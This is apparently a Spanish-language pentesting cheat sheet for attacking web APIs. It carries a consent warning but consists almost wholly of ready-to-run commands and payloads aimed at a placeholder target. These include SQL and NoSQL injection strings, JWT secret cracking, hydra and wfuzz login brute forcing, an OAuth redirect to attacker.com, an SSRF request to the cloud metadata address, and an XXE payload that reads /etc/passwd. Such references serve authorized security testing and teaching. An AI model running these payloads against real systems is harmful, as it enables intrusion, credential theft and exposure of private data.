Explotación de vulnerabilidades En esta sección veremos comandos y técnicas para evaluar la seguridad de APIs (REST, SOAP, GraphQL).
Nota: Este tipo de técnicas son muy invasivas, ya que vamos a obtener información de una API, por lo que no podemos utilizar estas técnicas sin un consentimiento o aprobación por parte del objetivo
Reconocimiento inicial
Identificación de endpoints
Copiar # Wayback Machine para históricos
curl "http://web.archive.org/cdx/search/cdx?url=target.com/api/*&output=json"
# FFuF para fuzzing de endpoints
ffuf -w wordlist.txt -u https://target.com/api/FUZZ -mc 200 -t 50
# Param Miner para parámetros ocultos
python3 parameth.py -u "https://target.com/api/v1/user" Documentación de API
Copiar # Buscar Swagger/OpenAPI
curl -s https://target.com/api/v1/swagger.json | jq
curl -s https://target.com/api-docs/ | grep -E 'swagger|openapi' Autenticación y Autorización
Pruebas de JWT
Copiar # Decodificar JWT
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c" | jwt decode -
# Ataque de fuerza bruta a secreto JWT
hashcat -m 16500 jwt.txt wordlist.txt OAuth Testing
Copiar # Probar parámetros OAuth
curl -X POST "https://target.com/oauth/token?client_id=CLIENT_ID&redirect_uri=https://attacker.com&response_type=token" Inyección y manipulación de datos
SQL Injection
Copiar # Pruebas básicas
curl -X GET "https://target.com/api/users?id=1'"
curl -X GET "https://target.com/api/users?id=1' OR '1'='1'--"
# Usando SQLmap
sqlmap -u "https://target.com/api/users?id=1" --risk=3 --level=5 NoSQL Injection
Copiar # MongoDB
curl -X POST https://target.com/api/login -H "Content-Type: application/json" -d '{"user":{"$ne":null},"pass":{"$ne":null}}'
# GraphQL
curl -X POST https://target.com/graphql -H "Content-Type: application/json" -d '{"query":"{users(search:\"admin' OR 1=1 --\"){id username}}"}' Manejo de datos sensibles
Búsqueda de información expuesta
Copiar # En endpoints
curl -s https://target.com/api/v1/users | jq '.[] | select(.email != null)'
# En caché
curl -X PURGE https://target.com/api/v1/users/123 Rate Limiting
Pruebas de fuerza bruta
Copiar # Con hydra
hydra -L users.txt -P passwords.txt target.com http-post-form "/api/login:username=^USER^&password=^PASS^:F=incorrect"
# Con wfuzz
wfuzz -z file,users.txt -z file,passwords.txt -d "username=FUZZ&password=FUZ2Z" https://target.com/api/login SSRF (Server Side Request Forgery)
Pruebas básicas
Copiar curl -X POST https://target.com/api/fetch -H "Content-Type: application/json" -d '{"url":"http://169.254.169.254/latest/meta-data/"}' XML External Entity (XXE)
Pruebas en APIs SOAP
Copiar curl -X POST https://target.com/soap-api -H "Content-Type: text/xml" -d '<?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><foo>&xxe;</foo>' Herramientas especializadas
Postman/Newman
Copiar # Colección de pruebas
newman run api_security_tests.json --env-var "baseUrl=https://target.com/api" OWASP ZAP
Copiar # Escaneo básico
zap-cli quick-scan -s all https://target.com/api/v1 Burp Suite
Copiar # Usando Turbo Intruder
python3 turbo-intruder-all.py targets.txt params.txt Automatización
Nuclei templates
Copiar nuclei -u https://target.com/api -t /path/to/api-templates Custom scripts
Copiar import requests
for endpoint in open('endpoints.txt'):
r = requests.get(f"https://target.com{endpoint.strip()}")
if 'password' in r.text.lower():
print(f"Possible sensitive data in {endpoint}") Relacionado
Última actualización hace 20 horas
